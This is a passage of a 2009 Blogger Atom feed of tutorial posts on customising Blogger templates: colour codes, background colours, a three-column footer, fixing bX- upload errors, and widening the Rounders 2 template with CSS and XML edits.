title='w.bloggar review and download here'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-3589289833300004401</id><published>2009-07-26T10:15:00.023-07:00</published><updated>2009-07-26T10:15:38.698-07:00</updated><title type='text'>Get HTML Color Code Values</title><content type='html'>Following are the links for HTML Color Code Values . You can copy these values of desired color and paste it where you want.&lt;span style="display: block;" id="formatbar_Buttons"&gt;&lt;span class="down" style="display: block;" id="formatbar_CreateLink" title="Link" onmouseover="ButtonHoverOn(this);" onmouseout="ButtonHoverOff(this);" onmouseup="" onmousedown="CheckFormatting(event);FormatbarButton('richeditorframe', this, 8);ButtonMouseDown(this);"&gt;&lt;img src="http://www.blogger.com/img/blank.gif" alt="Link" class="gl_link" border="0" /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;LINK 1&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span class="Apple-style-span" style="border-collapse: separate; color: rgb(0, 0, 0); font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: pre; widows: 2; word-spacing: 0px;font-family:'Lucida Grande';font-size:12;"  &gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://epages.page.tl/COLOR-VALUE.htm"&gt;COLOR-VALUE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;LINK 2&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="border-collapse: separate; color: rgb(0, 0, 0); font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: pre; widows: 2; word-spacing: 0px;font-family:'Lucida Grande';font-size:12;"  &gt;&lt;/span&gt;&lt;a href="http://html-color-codes.com/"&gt;html-color-codes&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;LINK 3&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.web-source.net/216_color_chart.htm"&gt;216 Web Safe Colors&lt;br /&gt;Hexadecimal RGB Values&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Go to any of the above sites and you will find various color codes for your site.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-3589289833300004401?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/3589289833300004401/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=3589289833300004401' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3589289833300004401'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3589289833300004401'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/get-html-color-code-values.html' title='Get HTML Color Code Values'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-4664618612711947948</id><published>2009-07-26T10:15:00.021-07:00</published><updated>2009-07-26T10:15:37.607-07:00</updated><title type='text'>How to change background color of blogger template?</title><content type='html'>Hi guys, you can easily change background color of blogger. For this you have to edit the blogger template.&lt;br /&gt;&lt;br /&gt;Here are those easy steps -&lt;br /&gt;&lt;br /&gt;1. Login to Blogger &gt; Layout &gt;  Edit HTML&lt;br /&gt;&lt;br /&gt;Now look for this&lt;br /&gt;&lt;br /&gt;body  {&lt;br /&gt;background:$bgcolor;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;You can find HTML color code value&lt;a href="http://free-blogger-help.blogspot.com/2009/02/get-html-color-code-values.html"&gt;&lt;span style="font-weight: bold;"&gt; here&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Say you have selected this color #66ffcc&lt;br /&gt;&lt;br /&gt;Now change the above code to&lt;br /&gt;&lt;br /&gt;body  {&lt;br /&gt;background-color:#66ffcc&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;/span&gt;;&lt;br /&gt;&lt;br /&gt;To change color of sidebar add the color code under the relevant sidebar heading&lt;br /&gt;&lt;br /&gt;#sidebar-wrapper  {&lt;br /&gt;background-color:#66ffcc&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;/span&gt;;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Change background color of main post column&lt;br /&gt;&lt;br /&gt;#main-wrapper  {&lt;br /&gt;background-color:#66ffcc&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;/span&gt;;&lt;br /&gt;&lt;br /&gt;After desired changes save the template.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-4664618612711947948?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/4664618612711947948/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=4664618612711947948' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4664618612711947948'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4664618612711947948'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-change-background-color-of.html' title='How to change background color of blogger template?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-7137022009908502950</id><published>2009-07-26T10:15:00.019-07:00</published><updated>2009-07-26T10:15:36.711-07:00</updated><title type='text'>How to make your footer 3 column?</title><content type='html'>You may have noticed a 3 column footer in many blogs, it's been quite popular these days.&lt;br /&gt;&lt;br /&gt;It's quite easy to add a 3 column footer to your blog just follow these steps -&lt;br /&gt;&lt;br /&gt;STEP I - First and foremost backup your template.This is a very essential step, in case anything goes wrong, you will be able to restore your previous template.&lt;br /&gt;&lt;br /&gt;STEP II - Now find this  code (you can use Ctrl+F in Mozilla Firefox)- &lt;blockquote&gt;&amp;lt;div id=’footer-wrapper’&amp;gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&amp;lt;b:section class=’footer’ id=’footer’/&amp;gt;&lt;/span&gt;&lt;br /&gt;&amp;lt;/div&amp;gt;&lt;/blockquote&gt;Note: Some templates may have only "footer" instead of "footer-wrapper".&lt;br /&gt;&lt;br /&gt;STEP III - Replace the red code with following code - &lt;blockquote&gt;&amp;lt;div id='footer-column-container'&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;div id='footer2' style='width: 30%; float: left; margin:0; text-align: left;'&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;b:section class='footer-column' id='col1' preferred='yes' style='float:left;'/&amp;gt;&lt;br /&gt;&amp;lt;/div&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;div id='footer3' style='width: 40%; float: left; margin:0; text-align: left;'&amp;gt;&lt;br /&gt;&amp;lt;b:section class='footer-column' id='col2' preferred='yes' style='float:left;'/&amp;gt;&lt;br /&gt;&amp;lt;/div&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;div id='footer4' style='width: 30%; float: right; margin:0; text-align: left;'&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;b:section class='footer-column' id='col3' preferred='yes' style='float:right;'/&amp;gt;&lt;br /&gt;&amp;lt;/div&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;div style='clear:both;'/&amp;gt;&lt;br /&gt;&amp;lt;p&amp;gt;&lt;br /&gt;&amp;lt;hr align='center' color='#5d5d54' width='90%'/&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;&amp;lt;div id='footer-bottom' style='text-align: center; padding: 10px; text-transform: lowercase;'&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;b:section class='footer' id='col-bottom' preferred='yes'&amp;gt;&lt;br /&gt;&amp;lt;b:widget id='Text2' locked='false' title='' type='Text'/&amp;gt;&lt;br /&gt;&amp;lt;/b:section&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;/div&amp;gt;&lt;br /&gt;&amp;lt;div style='clear:both;'/&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;/div&amp;gt;&lt;/blockquote&gt;Now save the template.&lt;br /&gt;&lt;br /&gt;STEP IV - Now find this tag - &lt;blockquote&gt;]]&amp;gt;&amp;lt;/b:skin&amp;gt;&lt;/blockquote&gt;&lt;br /&gt;Place this code before the above tag - &lt;blockquote&gt;#footer-column-container {&lt;br /&gt;clear:both;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;.footer-column {&lt;br /&gt;padding: 10px;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;}&lt;/blockquote&gt;Save the template.&lt;br /&gt;&lt;br /&gt;STEP V - Now go to your "Page Elements" page, you will find three columns in your footer.&lt;br /&gt;&lt;br /&gt;You are done now, add any Gadgets you wanna add to your footer columns and enjoy :-)&lt;br /&gt;&lt;br /&gt;If having any difficulty in implementing these steps, just leave a comment here.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-7137022009908502950?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/7137022009908502950/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=7137022009908502950' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7137022009908502950'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7137022009908502950'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-make-your-footer-3-column.html' title='How to make your footer 3 column?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-2416119615889121266</id><published>2009-07-26T10:15:00.017-07:00</published><updated>2009-07-26T10:15:35.809-07:00</updated><title type='text'>How to fix bx-errors while uploading templates?</title><content type='html'>&lt;img style="width: 594px; height: 422px;" src="http://2.bp.blogspot.com/_xn2gmPb9TfM/SaPbEvgqspI/AAAAAAAADtc/xEVInj2SO0c/s1600/Screen-Shot04%2BFeb.%2B24%2B11.32.jpg" alt="[Screen-Shot04+Feb.+24+11.32.jpg]" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Many of us may have experienced "bx-erros" while uploading new templates for your blog. This has been quite frequent these days. Some common codes that the bloggers received uploading a new template  are -&lt;br /&gt;&lt;span id="fullpost"&gt;&lt;ul&gt;&lt;li&gt;bx-bliced&lt;/li&gt;&lt;li&gt;&lt;span id="thread_subject_site"&gt;bX-ev85ll&lt;/span&gt;&lt;/li&gt;&lt;li&gt;bX-39cc9q&lt;/li&gt;&lt;li&gt;bX-y6cz0v &lt;/li&gt;&lt;li&gt;bX-982020&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/span&gt; When searched for the reason of this, I got this explanation from one of the Blogger employee -&lt;blockquote&gt;Recently we changed the way our template editor accepts certain third party code, so that it is now less tolerant of certain templates. We did this because we had seen a lot of data corruption due to 'bad templates,' and we are trying to stave off some of these issues pre-emptively.&lt;br /&gt;&lt;br /&gt;Now we realize that this has caused some inconvenience to folks, so we are re-thinking our decision and will post an update on that shortly. &lt;/blockquote&gt;Here are few steps that will help you getting these "bx-erros" while uploading new templates -&lt;br /&gt;&lt;span id="fullpost"&gt;&lt;ol&gt;&lt;li&gt;First of all, try to upload your new template in the Layout&gt;Edit HTML section of your dashboard. Not all templates have been affected by this issue, so it is advisable to check before attempting to edit your template significantly. If you do receive a bX-error code when trying to upload your template, you should proceed to step 2.&lt;/li&gt;&lt;li&gt;If your new template is an XML file (with the .xml entension), browse to where this is located on your computer and right click the file. Choose to open with Notepad (or your favorite basic text editor). If your template is contained within a text file (for you to copy and paste into the template editor), simply open this with your text editor.&lt;/li&gt;&lt;li&gt;Search for every instance of b:widget id= in your template, for example:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;b:widget id='Header1'&lt;/li&gt;&lt;li&gt;b:widget id='Blog1'&lt;/li&gt;&lt;li&gt; b:widget id='Label1'&lt;/li&gt;&lt;li&gt;b:widget id='HTML1'&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Replace each of these IDs with the next number up. For example, Header1 should become Header2; Blog1 should become Blog1, HTML3 should become HTML4 and so on.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Once you have changed each and every instance of widget id to a different number, you should save the template under a slightly different file name (to be aware of your altered file). If this is an XML file, be sure to save with the XML extension.&lt;/li&gt;&lt;li&gt;Now you have made these changes, attempt to upload your file again in the Layout&gt;Edit HTML section of your Blogger dashboard. &lt;b&gt;Now you should not receive the error code and will be able to upload your template&lt;/b&gt;.&lt;/li&gt;&lt;/ol&gt;If even after following these steps you are still getting the error, remove all the cookies and internet files from your web-browser and restart your web-browser, or you can use another web-browser. You can also use "CCleaner" which is a freeware for removing all the cookies and internet files.&lt;br /&gt;&lt;br /&gt;Hope this will help you. If you are still having any difficulty just leave a comment here.&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-2416119615889121266?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/2416119615889121266/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=2416119615889121266' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2416119615889121266'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2416119615889121266'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-fix-bx-errors-while-uploading.html' title='How to fix bx-errors while uploading templates?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_xn2gmPb9TfM/SaPbEvgqspI/AAAAAAAADtc/xEVInj2SO0c/s72-c/Screen-Shot04%2BFeb.%2B24%2B11.32.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-1785966484933897688</id><published>2009-07-26T10:15:00.015-07:00</published><updated>2009-07-26T10:15:34.708-07:00</updated><title type='text'>Create your own THREE column Rounders 2 Template for blogger.</title><content type='html'>Rounders 2 Template is a 2 column template. But you can make it of 3 column.&lt;br /&gt;It will look like -&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.videoactive.blogspot.com/"&gt;THREE column Rounders 2 Template&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://videoactive2.blogspot.com/"&gt;THREE column Rounders 2 Template Blue&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Lets do that:&lt;br /&gt;&lt;br /&gt;Apply Rounders 2 as your blogger template. Now go to Template &gt;&gt; Edit HTML. Look for following code&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;#outer-wrapper {&lt;br /&gt;width:740px;&lt;br /&gt;margin:0 auto;&lt;br /&gt;text-align:left;&lt;br /&gt;font: $bodyFont;&lt;br /&gt;}&lt;br /&gt;#main-wrap1 {&lt;br /&gt;width:485px;&lt;br /&gt;float:left;&lt;br /&gt;background:$mainBgColor url("http://www.blogblog.com/rounders2/corners_main_bot.gif") no-repeat left bottom;&lt;br /&gt;margin:15px 0 0;&lt;br /&gt;padding:0 0 10px;&lt;br /&gt;color:$mainTextColor;&lt;br /&gt;font-size:97%;&lt;br /&gt;line-height:1.5em;&lt;br /&gt;word-wrap: break-word; /* fix for long text breaking sidebar float in IE */&lt;br /&gt;overflow: hidden;     /* fix for long non-text content breaking IE sidebar float */&lt;br /&gt;}&lt;br /&gt;#main-wrap2 {&lt;br /&gt;float:left;&lt;br /&gt;width:100%;&lt;br /&gt;background:url("http://www.blogblog.com/rounders2/corners_main_top.gif") no-repeat left top;&lt;br /&gt;padding:10px 0 0;&lt;br /&gt;}&lt;br /&gt;#main {&lt;br /&gt;background:url("http://www.blogblog.com/rounders2/rails_main.gif") repeat-y;&lt;br /&gt;padding:0;&lt;br /&gt;}&lt;br /&gt;#sidebar-wrap {&lt;br /&gt;width:240px;&lt;br /&gt;float:right;&lt;br /&gt;margin:15px 0 0;&lt;br /&gt;font-size:97%;&lt;br /&gt;line-height:1.5em;&lt;br /&gt;word-wrap: break-word; /* fix for long text breaking sidebar float in IE */&lt;br /&gt;overflow: hidden;     /* fix for long non-text content breaking IE sidebar float */&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Rounders 2 hase 3 wrappers as following&lt;br /&gt;&lt;br /&gt;() outer-wrapper i.e.the entire blog&lt;br /&gt;() main-wrapper i.e. the main Blog Posts&lt;br /&gt;() sidebar-wraper i.e. the right sidebar&lt;br /&gt;&lt;br /&gt;Now we will create another sidebar i.e. left sidebar.&lt;br /&gt;&lt;br /&gt;So change the above code to the following. Changes are made in &lt;span style="color: rgb(0, 153, 0);"&gt;Green&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;#outer-wrapper {&lt;br /&gt;width:&lt;span style="color: rgb(0, 153, 0);"&gt;995px&lt;/span&gt;;&lt;br /&gt;margin:0 auto;&lt;br /&gt;text-align:left;&lt;br /&gt;font: $bodyFont;&lt;br /&gt;}&lt;br /&gt;#main-wrap1 {&lt;br /&gt;width:485px;&lt;br /&gt;float:left;&lt;br /&gt;background:$mainBgColor url("http://www.blogblog.com/rounders2/corners_main_bot.gif") no-repeat left bottom;&lt;br /&gt;margin:&lt;span style="color: rgb(0, 153, 0);"&gt;15px 0 0 15px&lt;/span&gt;;&lt;br /&gt;padding:0 0 10px;&lt;br /&gt;color:$mainTextColor;&lt;br /&gt;font-size:97%;&lt;br /&gt;line-height:1.5em;&lt;br /&gt;word-wrap: break-word; /* fix for long text breaking sidebar float in IE */&lt;br /&gt;overflow: hidden;     /* fix for long non-text content breaking IE sidebar float */&lt;br /&gt;}&lt;br /&gt;#main-wrap2 {&lt;br /&gt;float:left;&lt;br /&gt;width:100%;&lt;br /&gt;background:url("http://www.blogblog.com/rounders2/corners_main_top.gif") no-repeat left top;&lt;br /&gt;padding:10px 0 0;&lt;br /&gt;}&lt;br /&gt;#main {&lt;br /&gt;background:url("http://www.blogblog.com/rounders2/rails_main.gif") repeat-y;&lt;br /&gt;padding:0;&lt;br /&gt;}&lt;br /&gt;#sidebar-wrap {&lt;br /&gt;width:240px;&lt;br /&gt;float:right;&lt;br /&gt;margin:15px 0 0;&lt;br /&gt;font-size:97%;&lt;br /&gt;line-height:1.5em;&lt;br /&gt;word-wrap: break-word; /* fix for long text breaking sidebar float in IE */&lt;br /&gt;overflow: hidden;     /* fix for long non-text content breaking IE sidebar float */&lt;br /&gt;}&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;#newsidebar-wrap {&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; width:240px;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; float:left;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; margin:15px 0 0;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; font-size:97%;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; line-height:1.5em;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; word-wrap: break-word; /* fix for long text breaking sidebar float in IE */&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; overflow: hidden;     /* fix for long non-text content breaking IE sidebar float */&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; }&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;#newsidebar-wrap1 {&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; background:$mainBgColor url("http://www.blogblog.com/rounders2/corners_side_top.gif") no-repeat left top;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; margin:0 0 15px;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; padding:10px 0 0;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; color: $mainTextColor;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;#newsidebar-wrap2 {&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; background:url("http://www.blogblog.com/rounders2/corners_side_bot.gif") no-repeat left bottom;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; padding:10px 0px 8px;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;#newsidebar h2 { &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;  color: $postTitleColor;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;  border-bottom: 1px dotted $postTitleColor;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="color: rgb(0, 153, 0);"&gt; }&lt;/span&gt;&lt;blockquote&gt;&lt;/blockquote&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;Now we have to make changes in the Header and the Footer.&lt;br /&gt;&lt;br /&gt;Search for&lt;br /&gt;&lt;br /&gt;/* Blog Header&lt;br /&gt;&lt;br /&gt;Change following code&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-size:85%;"&gt;#header-wrapper {&lt;br /&gt;background:$titleBgColor&lt;br /&gt;url("&lt;span style="color: rgb(0, 0, 0);"&gt;http://www.blogblog.com/rounders2/corners_cap_top.gif&lt;/span&gt;") no-repeat left top;&lt;blockquote&gt;&lt;/blockquote&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;To this code&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-size:85%;"&gt;#header-wrapper {&lt;br /&gt;background:$titleBgColor&lt;br /&gt;url("&lt;span style="color: rgb(0, 153, 0);"&gt;http://www.blogpulp.com/imagehost/images/44575234.gif&lt;/span&gt;") no-repeat left top;&lt;blockquote&gt;&lt;/blockquote&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;And now look for below code&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-size:85%;"&gt;#header {&lt;br /&gt;background:url("&lt;span style="color: rgb(0, 0, 0);"&gt;http://www.blogblog.com/rounders2/corners_cap_bot.gif&lt;/span&gt;") no-repeat left bottom;&lt;blockquote&gt;&lt;/blockquote&gt;&lt;/span&gt;&lt;/blockquote&gt;And change to following code&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-size:85%;"&gt;#header {&lt;br /&gt;background:url("&lt;span style="color: rgb(0, 153, 0);"&gt;http://www.blogpulp.com/imagehost/images/346852006.gif&lt;/span&gt;") no-repeat left bottom;&lt;blockquote&gt;&lt;/blockquote&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;Now it's time for Footer&lt;br /&gt;&lt;br /&gt;Search for&lt;br /&gt;&lt;br /&gt;/* Footer&lt;br /&gt;&lt;br /&gt;Change following code&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-size:85%;"&gt;#footer-wrap2 {&lt;br /&gt;background:$titleBgColor&lt;br /&gt;url("&lt;span style="color: rgb(0, 0, 0);"&gt;http://www.blogblog.com/rounders2/corners_cap_top.gif&lt;/span&gt;") no-repeat left top;&lt;blockquote&gt;&lt;/blockquote&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;to below code&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-size:85%;"&gt;#footer-wrap2 {&lt;br /&gt;background:$titleBgColor&lt;br /&gt;url("&lt;span style="color: rgb(0, 153, 0);"&gt;http://www.blogpulp.com/imagehost/images/44575234.gif&lt;/span&gt;") no-repeat left top;&lt;blockquote&gt;&lt;/blockquote&gt;&lt;/span&gt;&lt;/blockquote&gt;Also change&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-size:85%;"&gt;#footer {&lt;br /&gt;background:url("&lt;span style="color: rgb(0, 0, 0);"&gt;http://www.blogblog.com/rounders2/corners_cap_bot.gif&lt;/span&gt;") no-repeat left bottom;&lt;blockquote&gt;&lt;/blockquote&gt;&lt;/span&gt;&lt;/blockquote&gt;to&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-size:85%;"&gt;#footer {&lt;br /&gt;background:url("&lt;span style="color: rgb(0, 153, 0);"&gt;http://www.blogpulp.com/imagehost/images/346852006.gif&lt;/span&gt;") no-repeat left bottom;&lt;blockquote&gt;&lt;/blockquote&gt;&lt;/span&gt;&lt;/blockquote&gt;We have to now change layout editor as we have created new sidebar.&lt;br /&gt;&lt;br /&gt;Search for following code&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;/** Page structure tweaks for layout editor wireframe */&lt;br /&gt;body#layout #main-wrap1,&lt;br /&gt;body#layout #sidebar-wrap,&lt;br /&gt;body#layout #header-wrapper {&lt;br /&gt;margin-top: 0;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;body#layout #header, body#layout #header-wrapper,&lt;br /&gt;body#layout #outer-wrapper {&lt;br /&gt;margin-left:0,&lt;br /&gt;margin-right: 0;&lt;br /&gt;padding: 0;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;body#layout #outer-wrapper {&lt;br /&gt;width: 730px;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;body#layout #footer-wrap1 {&lt;br /&gt;padding-top: 0;&lt;br /&gt;}&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Replace above code with following&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;/** Page structure tweaks for layout editor wireframe */&lt;br /&gt;body#layout #outer-wrapper,&lt;br /&gt;body#layout #header-wrapper,&lt;br /&gt;body#layout #footer-wrap1 {&lt;br /&gt;width: 750px;&lt;br /&gt;}&lt;br /&gt;body#layout #main-wrap1,&lt;br /&gt;body#layout .main .widget,&lt;br /&gt;body#layout .main .Blog {&lt;br /&gt;width: 400px;&lt;br /&gt;}&lt;br /&gt;body#layout #newsidebar-wrap {&lt;br /&gt;width: 150px;&lt;br /&gt;margin-top: 5px;&lt;br /&gt;}&lt;br /&gt;body#layout #sidebar-wrap {&lt;br /&gt;width: 150px;&lt;br /&gt;margin-left: 25px;&lt;br /&gt;}&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Now scroll down and look for following code&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;div id='main-wrap1'&amp;gt;&amp;lt;div id='main-wrap2'&amp;gt;&lt;br /&gt;&amp;lt;b:section class='main' id='main' showaddelement='no'&amp;gt;&lt;br /&gt;&amp;lt;b:widget id='Blog1' locked='true' title='Blog Posts' type='Blog'/&amp;gt;&lt;br /&gt;&amp;lt;/b:section&amp;gt;&lt;br /&gt;&amp;lt;/div&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;div id='sidebar-wrap'&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;now add following code in &lt;span style="color: rgb(0, 